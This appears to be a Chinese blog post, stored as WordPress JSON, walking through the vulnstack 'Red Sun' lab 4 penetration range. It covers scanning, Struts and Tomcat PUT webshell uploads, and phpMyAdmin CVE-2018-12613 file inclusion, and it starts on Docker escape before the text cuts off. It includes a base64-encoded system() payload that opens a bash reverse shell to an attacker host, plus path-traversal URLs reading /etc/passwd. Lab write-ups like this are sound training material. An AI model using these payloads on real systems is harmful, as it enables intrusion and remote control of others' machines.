{"id":1979,"date":"2026-05-08T20:06:21","date_gmt":"2026-05-08T12:06:21","guid":{"rendered":"https:\/\/koishi.team\/?p=1979"},"modified":"2026-05-25T20:44:52","modified_gmt":"2026-05-25T12:44:52","slug":"%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b","status":"publish","type":"post","link":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/","title":{"rendered":"\u7ea2\u65e5\u9776\u573a\u56db"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<h2 class=\"wp-block-heading\"><strong>\u673a\u5668\u5bc6\u7801<\/strong> \u7f51\u7edc\u914d\u7f6e<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u9776\u573a\u5730\u5740\uff1a<a href=\"http:\/\/vulnstack.qiyuanxuetang.net\/vuln\/detail\/6\/\">http:\/\/vulnstack.qiyuanxuetang.net\/vuln\/detail\/6\/<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u9776\u673a\u5bc6\u7801\uff1aWEB\u4e3b\u673a ubuntu:ubuntu<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>WIN7\u4e3b\u673a douser:Dotest123<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>(DC)WIN2008\u4e3b\u673a administrator:Test2008<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>\u53ea\u9700\u8981\u6539Ubuntu\u7684\u7f51\u5361\uff0c\u4ec5\u4e3b\u673a192.168.183.x<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image1-884x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"884\" height=\"1024\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image1-884x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1981\"  sizes=\"auto, (max-width: 884px) 100vw, 884px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">DC\uff1a192.168.183.130   Ubuntu\uff1a192.168.183.128\\192.168.22.145   Win7\uff1a192.168.183.129<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u73af\u5883\u642d\u5efa<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u5728ubuntu\u8d77\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>sudo docker start ec 17 09<br>sudo docker ps<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"940\" height=\"328\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1982\"  sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5982\u679c\u7f51\u9875\u4e2dphpmyadmin\u62a5\u9519\u5c31\u624b\u52a8\u5f00\u542fmysql\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>sudo docker ps -a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>docker start cve-2018-12613_mysql_1<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u4fe1\u606f\u641c\u96c6<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a><a><\/a>nmap -sP 192.168.22.0\/24<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>nmap -sS -sV -sC -p- -T4 -Pn 192.168.22.145<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>fscan.exe -h 192.168.22.145<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"422\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1984\"  sizes=\"auto, (max-width: 844px) 100vw, 844px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"585\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1985\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u626b\u63cf\u51fa\u6765\u4e00\u4e2a192.168.22.145\uff0c\u7aef\u53e3\u670922\uff0c2001\uff0c2002\uff0c2003<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"352\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1986\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"319\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1987\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"313\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1988\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u90fd\u80fd\u626b\u51fa\u6765cve<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>struts<\/strong><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"589\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1989\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"749\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1990\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u53ef\u4ee5\u547d\u4ee4\u6267\u884c\uff0c\u53ef\u4ee5\u4f20\u4e00\u4e2a\u53cd\u5f39shell\u4e0a\u53bb\uff0c\u8fd9\u91cc\u5c31\u4e0d\u6f14\u793a\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Tomcat<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7f51\u4e0a\u641c\u4e00\u4e0b\uff0c\u5229\u7528\u65b9\u6cd5\u662f\u7528burpsuite\u6293\u5305\uff0c\u4fee\u6539GET\u4e3aPUT\u4e0a\u4f20\u65b9\u5f0f\uff0c\u6dfb\u52a0\u6587\u4ef6\u540d1.jsp\/,\u53ef\u4ee5\u6dfb\u52a0shell\u811a\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f20\u4e00\u4e2ajsp<\/p>\n\n\n\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7f6a7d97-9681-4dd6-8385-f30edd0b8581\" href=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/20260508083249.zip\">20260508083249<\/a><a href=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/20260508083249.zip\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7f6a7d97-9681-4dd6-8385-f30edd0b8581\">\u4e0b\u8f7d<\/a><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u51b0\u874e3\u514d\u6740\u9a6c\uff0c\u5bc6\u7801pass<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image10.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"535\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1991\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"833\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1992\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>phpadmin<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a href=\"http:\/\/192.168.22.145:2003\/index.php?target=db_sql.php%253f\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\">http:\/\/192.168.22.145:2003\/index.php?target=db_sql.php%253f\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image12.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"638\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image12.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1993\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4f1a\u5f39\u51fa\u5185\u5bb9\uff0c\u8bf4\u660e\u5b58\u5728cve<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image13.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"338\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1994\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>phpMyAdmin=ebfe67e40bc5aa8e97d50167661dae16<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u518d\u8bbf\u95ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>system(base64_decode(\"YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyLjEyOS80NDQ0IDA+JjEi\")) ?&gt;'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>base64\u7f16\u7801\u7684\u5185\u5bb9\u662fbash -c &#8220;bash -i &gt;&amp; \/dev\/tcp\/192.168.22.129\/4444 0&gt;&amp;1&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u518d\u6b21\u8bbf\u95ee\u5305\u542bsession\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"711\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1995\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a href=\"http:\/\/192.168.96.15:2003\/index.php?target=db_datadict.php%253f\/..\/..\/..\/..\/..\/..\/tmp\/sess_298c370f24c0ded3fa0da86d03a12d93\">http:\/\/192.168.96.145:2003\/index.php?target=db_datadict.php%253f\/..\/..\/..\/..\/..\/..\/tmp\/sess_298c370f24c0ded3fa0da86d03a12d93<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5982\u679c\u8bbf\u95ee\u7684kali\u6ca1\u6709\u8fde\u63a5\u4e0a\uff0c\u8bf4\u660e\u4e4b\u524d\u7684payload\u574f\u4e86\uff0c\u53ef\u4ee5\u5f00\u65e0\u75d5\u6d4f\u89c8\u6216\u8005\u65b0\u5f00\u4e2a\u6d4f\u89c8\u5668<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"971\" height=\"375\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1996\"  sizes=\"auto, (max-width: 971px) 100vw, 971px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Docker\u9003\u9038<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6211\u4eec\u62ff\u5230\u4e86\u4e09\u4e2ashell\uff0c\u4f46\u662f\u4e09\u4e2aip\u90fd\u4e0d\u540c\uff0c\u6000\u7591\u5f00\u542f\u4e86Docker\u5bb9\u5668<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code><a><\/a>find \/ -name .dockerenv<\/code><\/pre>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"938\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1997\"  sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u67e5\u770b\u662f\u5426\u4e3adocker\u5bb9\u5668<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u67e5\u770b\u662f\u5426\u6709privileged\u7279\u6743\u6a21\u5f0f\u542f\u52a8\u7684\u5bb9\u5668\uff0cprivileged\u7279\u6743\u6a21\u5f0f\u62e5\u6709\u51e0\u4e4e\u548c\u4e3b\u673a\u4e00\u6837\u7684\u6743\u9650\uff0c\u5141\u8bb8\u5bb9\u5668\u8bbf\u95ee\u5185\u6838\u548c\u6240\u6709\u8bbe\u5907\uff0c\u601d\u8def\u662f\u6302\u8f7d\u4e3b\u673a\u7684\u6839\u76ee\u5f55\u4ece\u800c\u53ef\u4ee5\u8bfb\u5199\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8be6\u7ec6\u8bf4\u660e\u53ef\u4ee5\u770b\u8fd9\u4e2a\u535a\u5ba2\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.cnblogs.com\/CVE-Lemon\/p\/18674800\">https:\/\/www.cnblogs.com\/CVE-Lemon\/p\/18674800<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"342\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1998\"  sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/div><\/figure>\n\n\n\n<p 